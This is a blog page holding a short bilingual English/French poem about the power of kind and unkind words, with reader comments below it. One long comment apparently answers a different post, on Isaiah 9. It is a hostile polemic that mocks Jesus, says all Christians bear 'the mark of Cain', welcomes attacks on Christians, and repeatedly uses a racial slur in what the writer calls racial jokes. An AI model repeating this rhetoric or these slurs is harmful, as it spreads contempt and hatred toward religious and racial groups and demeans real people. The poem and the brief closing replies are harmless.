The mesirus nefesh which Mordechai and Esther had is what enabled them to reach the depth of their own souls, and this power is also available as an accessible spiritual light that shines on Purim. When a person merits to access the spiritual opportunity of Purim, he merits as well to reach the deep revelation of his own soul.
When One Cannot Differentiate Between Mordechai and Haman
Concerning our mitzvah to become intoxicated on Purim through wine, Chazal said: “One is obligated to become intoxicated on Purim ad d’lo yoda bein arur Haman l’baruch Mordechai (until he does not know the difference between ‘Cursed is Haman’ and ‘Blessed is Mordechai’).”
How does a person reach such a level, in which he does not know the difference between how Haman is cursed and Mordechai is blessed? The simple understanding of this is that a person has to become so drunk to the point that he is totally confused, and then he can’t tell the difference between Mordechai and Haman.
But what still needs to be understood is: Why do Chazal want a person to become so drunk?
As is well-known, the words “Arur Haman” and “Baruch Mordechai” have the same gematria (numerical value in Hebrew); they both equal 502. This is meant to show us that when a person becomes so intoxicated to the point that he reaches the innermost point of his soul – his place in himself where he feels complete emunah in the Creator – he can then reach the understanding that just as Mordechai helped the generation see how everything is in the hands of Hashem, so did Haman serve to accomplish this!
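The numerical claim above can be checked mechanically. Here is a minimal sketch in Python (the letter-value table is the standard gematria assignment, with final letters taking the same values as their regular forms; the `gematria` helper name is my own):

```python
# Standard gematria values for the Hebrew letters.
GEMATRIA = {
    'א': 1, 'ב': 2, 'ג': 3, 'ד': 4, 'ה': 5, 'ו': 6, 'ז': 7, 'ח': 8, 'ט': 9,
    'י': 10, 'כ': 20, 'ך': 20, 'ל': 30, 'מ': 40, 'ם': 40, 'נ': 50, 'ן': 50,
    'ס': 60, 'ע': 70, 'פ': 80, 'ף': 80, 'צ': 90, 'ץ': 90,
    'ק': 100, 'ר': 200, 'ש': 300, 'ת': 400,
}

def gematria(phrase: str) -> int:
    """Sum the gematria values of the Hebrew letters in a phrase,
    ignoring spaces and any non-letter characters."""
    return sum(GEMATRIA.get(ch, 0) for ch in phrase)

print(gematria("ארור המן"))    # Arur Haman
print(gematria("ברוך מרדכי"))  # Baruch Mordechai
```

Running it prints 502 for both phrases, confirming the equality stated above.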
This is the depth to the statement of Chazal, “The removal of the ring of Achashveirosh [to allow Haman’s decree] was greater than all the [accomplishments] of all 48 prophets and 7 prophetesses who prophesized for the Jewish people; for all of the prophecies did not cause them to repent, while Achashveirosh caused them to repent.”
Of course, this does not mean to imply that the wickedness of Haman is to be equated with the pure goodness of Mordechai. It is just that Haman was able to move us to do teshuvah, even more than our leaders and tzaddikim tried to do; and our enemy Pharaoh is praised in a similar way, because his cruel decrees aroused the Jewish people to do teshuvah.
When a person understands simply that Mordechai and Haman are different, because Haman is cursed and Mordechai is blessed, then it shows that he’s only in his conscious state. When a person becomes intoxicated and he reaches lo yoda bein Arur Haman L’Baruch Mordechai, he has reached his subconscious; he realizes that Hashem is in charge of everything, and therefore he is able to realize how even Haman’s decree of genocide was constructive for the Jewish people, because ultimately, the decree is what moved us to teshuvah and thus be saved.
Balancing Efforts With Emunah
Chazal state that when Haman argued with Achashveirosh to issue the decree against the Jewish people, Hashem swore and said: “Because of you, two days of celebration will come to the Jewish people.” What is the depth behind this matter, that Purim came to us in Haman’s ‘merit’?
On Pesach, we drink four cups of wine; there is a specific amount of how much we drink. But on Purim, there is no set amount to drink; the amount is ad d’lo yoda. We drink more on Purim than in any other time of the year. The purpose of drinking on Purim, as we said, is to reveal our above-consciousness. If we go over to a person when he’s completely drunk – he’s above his consciousness – and we ask him if he is grateful to Haman, he might answer “Yes”. Now, if he would say this when he’s not drunk and he’s totally conscious, then we would assume he is drunk…
So although we can reach very high levels through getting intoxicated on Purim – to reach our emunah in Hashem – still, we cannot live on this plateau during the rest of the year. If someone tries to live on this level all the time, he will become disillusioned, erroneously thinking that it is forbidden to go to work for a living. He won’t be able to lead his life properly.
The point of the above-consciousness must only be accessed at times, and one cannot live in it all the time. It is like our general avodah of rotzoh v’shov (“running and returning” in our spirituality); our inner and external worlds need to always be integrated. When we use our inner world, we have the perspective of emunah, which shows us that Hashem is running everything; and from the viewpoint of external reality, we choose how we will act and we take responsibility. We are aware of ourselves and we worry for ourselves.
We need to balance these two views – the viewpoint of our inner reality, emunah, and the viewpoint from our external reality, our various efforts, choices, and responsibilities that we have. The balance between these two viewpoints is a very subtle thing to accomplish. We have to keep balancing our lifestyle between two opposing viewpoints – our emunah, and our hishtadlus\efforts.
Understandably, it is impossible to say how exactly we balance our life with both emunah and hishtadlus. Balance requires inner understanding on our part. There are some people who take emunah to an extreme, and they don’t make enough hishtadlus. Others are too drawn after hishtadlus and they are seriously lacking in their emunah. Both of these people are imbalanced.
We all need to be balanced. There are certain times in which we need to use emunah, and there are times in which we need to focus on hishtadlus, and it also depends on each person’s unique situation.
Summary of Our Goal On Purim
To make these matters practical, we will now provide a brief summary of what was said here. The purpose of Purim is to clearly reveal our consciousness, our sub-conscious, and our above-conscious. To be clearer, on Purim we can become aware of how we want to act, as well as what we really want deep down – and ultimately, of Who is leading us [the Creator].
If a person reveals these aspects in himself over Purim, besides the joy of Chedvah that he reaches – which is external joy – he also merits to express the inner joys known as Gilah, Rinah and Ditzah.
In order to reach true Simchas Purim, it is not enough to have superficial joy. We need to reveal inner happiness in ourselves. And when we reveal our inner happiness, we will discover that the happiness was there all along, inside ourselves – but we never knew about it.
If a person feels after Purim that he now knows himself better than how he did before Purim, he has truly merited the “days of celebrations, joy and festivity” that Purim is. If he did not merit this, then his Purim has gone by like any other regular day of the year.
May Hashem merit all of us to rejoice together with true and complete happiness; that our consciousness (revealed aspects of our self), subconscious (hidden aspects of our self), and above-consciousness (our inner emunah) should all be perfected. And then, all of the Jewish people will merit to rejoice, together, with a complete heart.
Taanis 29a
Esther 8:15-17.
Avos D’Rebbi Nosson 34
Rashi Shemos 17:16
Shemos 18:9
Toras HaOlah
Eruvin 65a
Tehillim 104:15
Shir HaShirim 3:1
See the author’s series Getting To Know Your Thoughts
See Getting To Know Your Inner World: Chapter 5: The Intellect and the Heart.
Orach Chaim 695:2
Gittin 7b
Tehillim 92:3
Tehillim 104:15
Sotah is a married woman who is convicted of having marital relations with another man; if she has been properly warned by her husband and she is found guilty by two witnesses, she is brought to the Beis HaMikdash, where she must either drink the “Bitter Waters”, or confess her crime [whereupon she must get divorced]. If she drinks the water and she had been falsely accused, she is deemed innocent, and she merits blessing and long life. If she was indeed guilty, she dies from the water, in a most horrible fashion. The Sages say that one who observes this must become a Nazirite and abstain from wine. See Tractate Sotah of Talmud Bavli.
Berachos 63a
For more on how one can work on this perspective of emunah, see Bilvavi Mishkan Evneh, Part 3, Section VI: Emunah\Faith.
Yoma 85b
Megillah 7b
Megillah 14a
Shemos Rabbah 21
Yalkut Shimeoni Esther 1054 | <urn:uuid:550189b4-b955-4acc-a239-d4b39f77cf7e> | CC-MAIN-2023-14 | http://beyondbt.com/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950373.88/warc/CC-MAIN-20230402012805-20230402042805-00202.warc.gz | en | 0.973507 | 13,965 | 2.5625 | 3 |
In the context of quantum teleportation, my lecturer writes the following (note that I assume the reader is familiar with the circuit):
If the measurement of the first qubit is 0 and the measurement of the second qubit is 0 , then we have the state $\left|\phi_4\right>=c_0\left|000\right>+c_1\left|001\right>=\left|00\right>\otimes \left(c_0\left|0\right>+c_1\left|1\right>\right)=\left|00\right> \otimes \left|\psi '\right>$.
Now to get the final teleported state we have to go through the final two gates $Z, X$.
My lecturer writes this as:
$\left|\gamma\right>=Z^0X^0\left|\psi '\right>= \left|\psi'\right>= c_0\left|0\right>+c_1\left|1\right>$
Here are my questions:
Why is it that we do not have $\left|\gamma\right>=Z^0X^0\left(\left|00\right>\otimes \left|\psi '\right>\right)$? I don't understand why we cut the state $\left|\phi_4\right>$ "in half", to use bad terminology, at this step.
What does the superscript 0 on the operators refer to?
In the final state (again, to use bad terminology) we only use half of the state $\left|\phi_4\right>$. Can we always assume that the final state will be the $\left|\psi'\right>$ part of $\left|\phi_4\right>=\left|xy\right>\otimes\left|\psi'\right>$, and if so, what is the significance of the final step?
If my question is unanswerable due to a deep misunderstanding of the math processes here, I'd still really appreciate some clarification on whatever points can be answered and I can edit it to make more sense as I learn. | <urn:uuid:85e655b1-5d5a-4155-bf9d-46d6e1a6b18c> | CC-MAIN-2023-14 | https://quantumcomputing.stackexchange.com/questions/5913/understanding-this-description-of-teleportation | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948965.80/warc/CC-MAIN-20230329085436-20230329115436-00602.warc.gz | en | 0.83147 | 483 | 2.921875 | 3 |
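A quick numerical sanity check of the factorisation and of the trivial $Z^0X^0$ correction might help clarify the question (a sketch, assuming NumPy; the amplitudes $c_0 = 0.6$, $c_1 = 0.8$ are arbitrary normalised values picked for illustration):

```python
import numpy as np

# Arbitrary normalised amplitudes for the teleported state.
c0, c1 = 0.6, 0.8
ket0 = np.array([1.0, 0.0])
ket1 = np.array([0.0, 1.0])

# |phi_4> = c0|000> + c1|001>
phi4 = c0 * np.kron(np.kron(ket0, ket0), ket0) \
     + c1 * np.kron(np.kron(ket0, ket0), ket1)

# Claimed factorisation: |00> (x) |psi'>, with |psi'> = c0|0> + c1|1>.
psi_prime = c0 * ket0 + c1 * ket1
assert np.allclose(phi4, np.kron(np.kron(ket0, ket0), psi_prime))

# Z^0 X^0 is the identity, so the correction leaves |psi'> unchanged.
Z = np.diag([1.0, -1.0])
X = np.array([[0.0, 1.0], [1.0, 0.0]])
correction = np.linalg.matrix_power(Z, 0) @ np.linalg.matrix_power(X, 0)
assert np.allclose(correction @ psi_prime, psi_prime)

print("factorisation and trivial correction verified")
```

If the measurement outcomes were 1 rather than 0, the same script with `matrix_power(Z, 1)` or `matrix_power(X, 1)` would show the nontrivial corrections acting on the third qubit only.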
Definition:Hereditary Property (Topology)
Let $\xi$ be a property whose domain is the set of all topological spaces.
Then $\xi$ is a hereditary property if and only if:
- $\map \xi X \implies \map \xi Y$
where $Y$ is a subspace of $X$.
That is, whenever a topological space has $\xi$, then so does any subspace.
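As a worked instance of the definition (an illustrative addition, not part of the original page): take $\xi$ to be the Hausdorff property; the defining implication can be verified directly.

```latex
% Sketch: the Hausdorff property is hereditary.
% Let X be Hausdorff and let Y be a subspace of X.
% For distinct y_1, y_2 \in Y, choose disjoint open sets U_1, U_2 \subseteq X
% with y_1 \in U_1 and y_2 \in U_2 (possible since X is Hausdorff).
% Then U_1 \cap Y and U_2 \cap Y are disjoint open neighbourhoods of
% y_1 and y_2 in the subspace topology, so Y is Hausdorff:
\map {\mathrm{Hausdorff}} X \implies \map {\mathrm{Hausdorff}} Y
```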
- 1978: Lynn Arthur Steen and J. Arthur Seebach, Jr.: Counterexamples in Topology (2nd ed.) ... (previous) ... (next): Part $\text I$: Basic Definitions: Section $1$: General Introduction
- 1989: Ephraim J. Borowski and Jonathan M. Borwein: Dictionary of Mathematics ... (previous) ... (next): hereditary: 3. (of a topological property)
- 2014: Christopher Clapham and James Nicholson: The Concise Oxford Dictionary of Mathematics (5th ed.) ... (previous) ... (next): hereditary property | <urn:uuid:2db53fff-beaa-4538-b87d-a8dfe93ae138> | CC-MAIN-2023-14 | https://proofwiki.org/wiki/Definition:Hereditary_Property_(Topology) | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943471.24/warc/CC-MAIN-20230320083513-20230320113513-00003.warc.gz | en | 0.677286 | 239 | 3.09375 | 3 |
The cosmic background (CB) radiation, encompassing the sum of emission from all sources outside our own Milky Way galaxy across the entire electromagnetic spectrum, is a fundamental phenomenon in observational cosmology. Many experiments have been conceived to measure it (or its constituents) since the extragalactic Universe was first discovered; in addition to estimating the bulk (cosmic monopole) spectrum, directional variations have also been detected over a wide range of wavelengths. Here we gather the most recent of these measurements and discuss the current status of our understanding of the CB from radio to $\gamma$-ray energies. Using available data in the literature we piece together the sky-averaged intensity spectrum, and discuss the emission processes responsible for what is observed. We examine the effect of perturbations to the continuum spectrum from atomic and molecular line processes and comment on the detectability of these signals. We also discuss how one could in principle obtain a complete census of the CB by measuring the full spectrum of each spherical harmonic expansion coefficient. This set of spectra of multipole moments effectively encodes the entire statistical history of nuclear, atomic and molecular processes in the Universe.
Hill, Ryley; Masui, Kiyoshi W.; Scott, Douglas
2018, Applied Spectroscopy, 72, 663 | <urn:uuid:e2a3acff-4a88-4610-927c-38378f5ed409> | CC-MAIN-2023-14 | https://gabi.hyperstars.fr/2018/09/03/hill-masui-scott-2018-the-spectrum-of-the-universe/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948620.60/warc/CC-MAIN-20230327092225-20230327122225-00603.warc.gz | en | 0.891823 | 280 | 2.625 | 3 |
Never forget this:
- An angry word can hurt a sensitive heart.
- A word of reproach can cause tears to flow.
- An impatient and thoughtless word can darken a day that promised to be bright.
- A word of kindness can ease a hurting heart.
- A word of sympathy can comfort a soul in distress.
- A word of encouragement and hope can light a dark path.
N’oubliez jamais ceci :
- Un mot de colère peut blesser un cœur sensible.
- Un mot de reproche peut faire couler des larmes.
- Un mot impatient et irréfléchi peut assombrir un jour qui s’annonçait radieux.
- Un mot de bonté peut soulager un cœur qui souffrait.
- Un mot de sympathie peut consoler une âme en détresse.
- Un mot d’encouragement et d’espoir peut éclairer un chemin sombre.
🌼© Jeannette Bourassa 2022
10 comments on « A Word ! | Un Mot ! »
Very nice, Jeannette. 💞
Thank you for taking time to read my post. Have a good day.
Growing Godly – For Us: Wonderful Counselor (Isaiah 9:1-7)
Your Title holds the thesis statement of your piece. Yet immediately you make a confused collage hodgepodge. Silly foreign alien to the Hebrew T’NaCH common law codification, running around like a chicken with its head cut off – has nothing what so ever to do with Godliness. T’NaCH prophets command mussar. The heart and soul of all T’NaCH literature, “your piece” remains blithely, completely oblivious there unto. Your piece speculates that the prophet had visions of your silly messiah counterfeit about a millennium before some Roman propagandist introduced the new testament.
The new testament narishkeit, appeared at the height of a series of Jewish Wars fought to expel the Romans from Judea. Half, if not more of the entire population of Judea died fighting those wars. The Romans would expel the survivors, sold and scattered across the Western Roman empire as captured slaves. Jews experienced a dark night of death, oppression, blood libels, taxation without representation, imprisonment behind dark ghetto walls without charges and unable to confront our accusers. The “Godly” European barbarians, their reign of absolute terror and injustice culminated in the first half of the 20th Century, when Godly Xtians murdered 75% of European Jewry in less than 4 years.
T’NaCH prophets command mussar. The T’NaCH does not exist as an ancient book of history. The stories within the pages of the T’NaCH teach Aggaditah. 1/4th of the Sha’s Bavli (Babylonian Talmud) teaches Aggaditic stories of mussar. The absolute arrogance of your religion, wherein priests and pastors, one and all, throughout some 2000+ years of cruel injustice and bloodshed, not limited only to Jewish minority refugee populations by a long shot, this religion of arrogance presumes that its religious elite can interpret and understand the T’NaCH completely divorced and removed from the culture customs practices and ways of the people who wrote all the Books of the T’NaCH and Talmud.
Prophetic mussar rebukes all generations living. It’s this unique quality which defines prophesy. Not only does your tumah arrogance not know the basic fundamentals of Yiddishkeit, for 2000+ years your priests and pastors remain blind to the central instruction of all the T’NaCH prophets – Mussar. Your silly narishkeit reads by rote and projects upon your pie in the sky JeZeus. But Jews have reconquered our homelands following the Shoah. My people rose from the grave yards of Europe and we rule and govern the oath sworn lands. Your pie in the sky narishkeit, no longer tolerated.
Justice – Jews have ceased existing as stateless refugee populations scattered across the face of the earth. Now the church rots and stinks in exile – waiting for the 2nd Coming of JeZeus the mamzer son of Mary. Much to the shock and dismay of Europe. European States of England, France, Germany, and Russia no longer sit as the Great Powers, who at a whim can carve nations into Spheres of Influence, like as done with 19th Century China. China’s Century of Shame, like that of the Israeli nation has ended. And your Roman based counterfeit religion never saw it coming.
Church corruption and oppression throughout its entire history on this Planet has shaped the din known as “Fear of Heaven” upon that cursed religion of bloodshed. All Xtians bear the mark of Cain unto all eternity. The days of your dominance and cruel misrule have reached their end. Both America and Europe – secular societies. Attacks made against Xtians mounts and increases as the years pass. The influence of priests and pastors withers and fades with each sex scandal or association of church finances with the Mafia. Rome sits perched in complete and total isolation. Popes ride in a heavily armored popemobile, to protect him from assassination.
[[[“””The prophet would go on to say, “The people will pass through the land, greatly distressed and hungry. And when they are hungry, they will be enraged and will speak contemptuously against their king and their God, and turn their faces upward. And they will look to the earth, but behold, distress and darkness, the gloom of anguish. And they will be thrust into thick darkness.” (Isa 8:21-22). While the Assyrian army invaded the land of Judah (tribal territories of Zebulun and Naphtali or more commonly known in NT as Galilee) leaving the land famished, empty and in total despair and darkness. Left alone, there was little hope in Judah. Isaiah’s prophecy in chapter 9 is in a verbal tense that the action is already completed, yet we know it was not. The prophet trusted God’s promises were already fulfilled because of His faithfulness to his covenant promise to give help and hope (Gen 12:1-3, Ps 105:8-11).”””]]]
Shall limit the study of Jewish common law to your quoted Isa 8:21-22. This cherry picking of verses manifests propaganda, without any awareness of Jewish common law. The latter stands upon precedents. Both the T’NaCH and Talmud learn by means of making close precedent comparisons. This my 3rd comment upon your gibberish narishkeit, shall repeat: All T’NaCH p’sukim, contained within a larger sugia. Logic stands upon Order. The Order of the T’NaCH – sugiot. Your biblical translations, one and all, uprooted the Order of sugiot within the T’NaCH. As a consequence, Xtians lost the ability to learn within the context of a sugia.
T’NaCH common law compares sugiot with similar sugiot. The new testament books of propaganda make Joseph Goebbels proud. Ripping a p’suk\verse from its sugia contexts violates the principles of T’NaCH common law. Beginning with the New Testament itself, this counterfeit religion acted as if Jewish customs, culture and ways never existed. In the late 19th Century, German Protestant Higher Criticism made precisely this exact error. It viewed the T’NaCH as Paleontologists study fossils. Alas for these pathetic “scholars”, T’NaCH does not teach history. This fundamental error likewise defines all Xtian “scholarship” to this very day.
Church fanatics confuse ancient literature with history. While the T’NaCH shares tangential points with history, the T’NaCH Aggaditic stories teach mussar. Mussar does not depend upon the physical existence of any character within its pages. Aggaditah compares more to fictional novels rather than historical biographies. Church creeds, theologies, dogmatism, and doctrine absolutely requires a physical historical JeZeus. T’NaCH aggadic characters by stark contrast, their mussar instructs the generations of bnai brit Israel irregardless whether those characters of Aggaditah physically lived on this planet earth.
T’NaCH prophetic mussar commandments apply to all generations of bnai brit Israel, both with in the Constitutional Republic and in g’lut\exile. The prophets mussar seeks to arouse the hearts of my people to do t’shuvah. T’shuvah shares no common ground with “repentance”. The latter depends upon ‘Sin’. T’shuvah weighs the measure that bnai brit Man turns away from following and embracing assimilation to foreign cultures and customs of alien Goyim who never accepted the Torah at Sinai and Horev.
Xtianity, from its inception till today pays no heed to Jewish culture customs manners and ways. Therefore the Xtian notion of repentance operates in a completely different galaxy than does t’shuvah. Mitzvot learn from other mitzvot, just as Common law stands upon precedents. Torah commandments apply in both the oath sworn lands and g’lut. Observance of mitzvot, only Jews living within the oath sworn lands can sanctify mitzvot observance. Doing mitzvot לשמה defines all T’NaCH mitzvot. The opening Mishna of גטין\divorce/ teaches that g’lut Jewry lost the wisdom to do mitzvot לשמה. Observance of mitzvot לא לשמה defines g’lut Jewry like the cherry picking of p’sukim\verse defines the new testament fraudulent scriptures.
Ezra and the Men of the Great Assembly sealed the masoret known as the literature of the T’NaCH. The new testament attempt to enfranchise the new testament with the T’NaCH, it ignored the decree whereby Ezra and the Men of the Great Assembly, in the early formative years of the 2nd Commonwealth, whereby these sages sealed the literature of the T’NaCH. Later Jewish Alexandria Jewry writers, like Ben Sira and Egyptian Hellenistic writers of that era, their Apocrypha Books, excluded from the sealed T’NaCH masoret\tradition/Kabbalah. How much more so, the Roman counterfeit new testament narishkeit\non sense.
Xtians gossip among themselves and say that the only difference between Yiddishkeit and Xtianity, Jews reject Jesus as the messiah. No. Much more fundamental, Jews reject the religion of Xtianity which bases itself upon theologies and creeds rather than Common law. Doing mitzvot לשמה applies to all generations of Jews. The idea of messiah, whether he came or has yet to come, shares no common ground with the obligation to do mitzvot לשמה. No person can do mitzvot לשמה for other bnai brit. The foreign alien idea of the Roman Messiah, it shares no common ground with the T’NaCH faith of the obligation upon all bnai brit Jewry, in all generations to do mitzvot לשמה – the 1st commandment of the revelation of the Torah @ Sinai.
Why, for example, did the Wilderness generation die in g’lut? That generation accepted the revelation of the Torah @ Sinai! That generation did not accept the Torah לשמה. The Yatzir Ha’Rah seduces the hearts of all generations of bnai brit to do and keep the Torah לא לשמה – the 1st Commandment of the revelation of the Torah @ Sinai. Why does the first commandment @ Sinai make mention of Egypt? The Yatzir Ha’Rah continually seduces Israel to return back to Egypt. How? The Yatzir Ha’Rah encourages bnai brit Man to assimilate to the culture customs and ways practiced by the societies of both Egypt and Canaan. Assimilation defines avodah zarah – the 2nd commandment of the revelation of the Torah @ Sinai.
The avodah zara of both Xtianity and Islam, both “assimilate” and translate the Spirit Name of HaShem ie רוח הקודש\Holy Spirit/ unto words: YHVH, Yahweh, Jehovah, Lord, Father, Yeshuah, Jesus, Allah etc etc etc. Translating the רוח הקודש Name unto words defines the avodah zarah – the sin of the Golden Calf – the definition of the 2nd Commandment @ Sinai. Jews reject the new testament because it share no common ground with the common law Hebrew T’NaCH and Talmud. Many things depict the history of the church, but justice has no part or portion with that religion of avodah zarah. Now ‘Fear of Heaven’ exposes the trash name\destroyed reputation/ of Xtianity and the Xtian faith…’by their fruits you shall know them’.
Adam and Eve attempted to conceal their nakedness in the Garden; vanity of vanity all is vanity. Xtianity has preached the disgrace of sin. Oblivious of the sins committed by the church in all generations. But post Shoah, with the rise of the Jewish State of Israel, Jews will rub the noses of Xtianity into the stink of their sins, like a man house trains a puppy. Xtians now wear the shoes of exile, and measure for measure they can expect no compassion nor mercy by Jews for their sins. They can cry out to JeZeus, but their noise accomplishes nothing. The wait in g’lut and rot. Jews mock them saying: when’s the 2nd coming?!
Let’s learn. Your cherry picked p’sukim\verses sit within the sugia of ח:יט-ט:ו This sugia have previously addressed. Therefore this time around shall bring bracketing precedents from other Books of the T’NaCH. Seeing that notions of messiah have infected your brain, something like rabies, shall make a study of precedents in the Books of Shmuel, to first bracket your diseased mind, and then thereafter fire for effect.
Mitzvot learn from other mitzvot. This basic rule which defines all T’NaCH and Talmudic literature, it specifically defines the mitzvah of Moshiach. Which Torah commandment did the prophet Shmuel base his mitzva of Moshiach upon? In 2000+ years of skewed Xtianity, not a single Goy has ever asked this most basic and fundamental question. Fear of Heaven derides and mocks all Xtian theology, creeds, dogma, and doctrines. Moshe the prophet commands a simple commandment: do not add or subtract from any of the commandments which the greatest of all prophets commands.
The believers have not done their homework, not in 2000+ years. What a complete and total disgrace. שמואל א יז:לו David’s confidence that עמלו אל that HaShem guided his path walk, irregardless of lions and bears, that in this conflict with the Philistine giant, that here too he would prevail. Contrast this one verse sugia with your sugia where the Yatzir Ha’Rah entices people to place their trust in witches and necromancers. King Shaul, the rejected Moshiach, consorted with a necromancer witch on the day that he died in battle.
Now shall bracket your sugia by slightly overshooting the mark. שמואל א ל:א-ו. Confronted by disaster, David maintains his cool and confidence that HaShem guides the walk of his destiny. Now – Fire for Effect: BOOM! שמואל א כט:ו-יא Whether and whomever David served, he served both friend or foe with integrity. This precise precedent understands the k’vanna of your cherry picked p’sukim – Isa 8:21-22.
Stars (cough) fade…. Deuteronomy…messiahs bite dust…. eschatology… what’s beautiful picture for these words?
Original research which views both T’NaCH and Talmud as common law codifications.
Recall my absolute shock, during the opening days of formally learning Torah @ the Chabad Yeshiva in Har Nof Jerusalem. The Rosh Yeshiva, rabbi Kaplan, introduced the Mishna as a Common Law Case\Rule/ legal system. No rabbi before or since ever made such a definitive understanding of the Mishna. Did this Common law legal system equally apply to the T’NaCH? My research argues most definitely YES.
Since moving to Israel in 1991, have made efforts to do t’shuvah. T’shuvah shares no common ground with the Xtian Anathema known as repentance. T’shuvah addresses the plague of Jewish assimilation to foreign cultures and customs practiced by peoples and societies who never accepted the revelation of the Torah @ Sinai and Horev. Assimilation represents the bane of g’lut Jewry’s existence throughout our 2000+ years in accursed g’lut. Stateless Jewish refugee populations scattered in tiny enclave population centers dispersed across the Middle Eastern Sephardi black communities and Ashkenazic white European communities. All Jews throughout history have struggled with doing t’shuvah in the face of assimilation.
Jewish assimilation defined as: Jews who abandon our Cohen identities and embrace the cultures and customs of alien peoples; comparable to the black folk, former slaves, who embraced the Xtian religion of their slave-owning masters. As an Israeli, have made a lot of racial humor which lampoons black assimilation to their white overlords. Religious Jews in Israel refer to themselves as "Black". My humor attempts to compare religious haredi Jews to 'niggers'; alas, few of my peers make the jump whereby my humor mocks my own people.
Most people who hear my racial jokes never make the משל\נמשל דיוקים. They take a טפש פשט literal understanding of my racial slurs. They assume that racist jokes refer to black folk in America rather than to the butt of religious Haredi Jews in Israel. The missionizers in Tulsa, Oklahoma, for example, did not know how to respond when this lost Jew boy, as they viewed me, informed them that I considered myself a heathen atheist, praise G-d. Religion, whether practiced by Goyim or Jews, tends to assume a view of itself as much too praiseworthy.
Religion, all religion, merits taking its "holiness & perfection" with a large grain of salt. Most religious Jews whom I have encountered in Israel remind me of a dog who continually chases after its tail, or a silly hamster who runs itself half to death on a treadmill. Most religious Yidden simply adore religious rhetoric and propaganda. Something like the Fascists of Nazi Germany loved their pomp parades and night-time rallies.
They love the ribbons and bells and never ever attempt to explore, much less understand, the substance and purpose behind the ritual pageantry. Nothing galled me more in my youth than when I visited the homes of my black mamma maids and there they displayed their Xtian religious relics. My black mamma maids lived on the other side of the tracks! In the early 1960s Jim Crow laws still prevailed in Midland, Texas. It equally infuriated me whenever my mother would consider herself "above" blacks, her social inferiors.
From an early age, tended to associate religion and racism as two peas in the same pod. Have never felt comfortable or at ease when around religion. Whenever religious mass movements come together, Power rather than morality defines their purpose. Religious power compares to Socrates forced to drink a cup of poison hemlock. Sooner trust that a snake would not bite me if I stepped on it, than trust the power of religion not to convert me into becoming arrogant. Very much feel at home with secular society. Herein explains the burr under my saddle in matters of doing t'shuvah!
How does a Yid divorce T'NaCH and Talmud from Frumkeit? The Haredi Yidden behave much as my mother behaved toward blacks. Secular society, poor nebekals – "broken children"! [Hebrew employs such quaint terms for social contempt. Nebek, a pathetic social inferior who merits nothing but extreme pity; תינוק שנשבר: (literally: a Jewish child captured and raised by Goyim)].
As if the children of Haredi Yidden families don't struggle with assimilation just as much as, or more than, the children of secular Yidden families! Religion spews a poison of "I am Saved" arrogant social superiority, expressed through the different kippa head coverings. G-d forbid that a person who dons a kippah sruga (knitted kippa) should ever disgrace himself, even on Purim, by wearing a black haredi kippa!
Immediately noticed, from day one in Yeshiva, that the religious commentaries on the Talmud and T'NaCH did not lampoon and criticize religious Jewry. Religious Jewry, their shit doesn't also stink? Disputes define all the commentaries ever written. Yet, despite these bitter disputes, no rabbinic authority ever criticized Jewish religious practices as wrong! This fundamental and basic flaw in the pursuit of religious commentaries, pilpulism, caused me to first reject the Reshonim commentaries upon the T'NaCH and Talmud. What happened to the priority of Mussar during the Middle Ages? The 'Golden Age' of Spain witnessed a total rabbinic assimilation to the rediscovered ancient Greek philosophers!
The silence, the total lack of denunciation for the betrayal of rabbinic authorities, their public assimilation to despised ancient Greek cultures and customs … what, Jews light the lights of Chanukah only for the lights themselves! This realization, that's when I started mocking "black" Haredi Jews by lampooning the niggers of America! It never ceased to amaze me that religious Yidden failed to grasp that my racial jokes mocked religious Haredi Jews, and not the black people of American society! Haredi Yidden just could not get past the racial ribbons and bells to grasp that my harsh criticism directly denounced their religion of rabbinic assimilation.
Assimilation — the first face of avodah zarah. A direct violation of the 2nd Commandment of Sinai. Two key figures define this avodah zarah: (1) King Shlomo’s construction of the 1st Temple; (2) The Rambam’s halachic perversion of Rabbi Akiva’s פרדס explanation of the revelation of the Oral Torah @ Horev. This line of research delves into a highly complex and difficult realm of scholarship. For example, never in 2000+ years has any Xtian “scholar” realized that the Hebrew T’NaCH functions as the first common law codification. The Reshonim scholarship likewise crashed on this reef of T’NaCH common law!
As a T'NaCH\Talmud researcher, seek to view both T'NaCH and Talmudic subjects from a completely different perspective. Have presented arguments which denounce both king Shlomo's decision to build the Temple and the Rambam's halachic codification as ruinous, an absolute disaster for all generations of Jewry that came thereafter. Herein explains, in a new way, the classic Hebrew concept of ירידות הדורות: a theological idea which holds that later generations lack the mental capabilities possessed by earlier generations. This rabbinic dogmatism has plagued my people for a very long time. How to refute and negate this long-standing dogma held near and dear among my rabbinic peers?
Decisions taken by a great leader produce, so to speak, a domino effect. Once Shlomo built the Temple, no one thereafter ever challenged the validity of this decision; not the kings who came after Shlomo, nor the prophets. The construction of the Temple, rather than the priority of establishing a Federal Sanhedrin court system, immediately switched the 'Golden Ideal' goal posts. All kings thereafter viewed the grand images of the Temple as the golden ideal. צדק צדק תרדף became just a backwater eddy.
But what if king Shlomo ignored the counsel of the prophet NaTan, just as his son at Sh'Cem ignored the elders who had advised king Shlomo when he ruled as king? Because no Jewish authority ever asked this question, all later generations lacked the mental ability to put the nation back on its original destiny path walk! Israel came out of the bondage of Egypt to rule the oath-sworn lands with justice. HaShem did not redeem Israel from oppressive slavery just for our People to build ornate and spectacular Temples.
The same equally holds true for how the Rambam halachic code redefined the concept of halachah. Because no one challenged the premise which the Rambam code established, no generation thereafter could ever correct the gross error in judgment made by the Rambam. The Rambam code quickly overshadowed the B'hag, Rif, and Rosh codes, which compared halachic precedents to a Case\Rule Mishna. Prophetic mussar, too, became just a backwater eddy. Aggaditah turned 'black'; just a poor nigger pariah 'boy'! It became fit only for quaint women's learning; the T'NaCH transformed into a history book!
Rabbis in Yeshiva quite often skipped over the Aggadic portions of the Talmud in order to focus upon the Rambam perversion of Talmudic halachah! Yeshiva students became oblivious to the spirit of prophetic mussar, how it breathes life into the halachic forms of ritual observance. Students could only see the halachic ritual whistles and bells; what mussar rebuke lay beneath the shiny tinsel did not interest them in the least. Baali T'shuvah Yeshivot in Jerusalem cranked out mass-produced Frumkeit Yidden, all uniformly dressed up in their holier-than-thou religious uniforms.
Thanks for your detailed reply. Let me get back to you when library permits.
Thank you for taking the time to read my post. And have a good day.
Okay dear 🥰
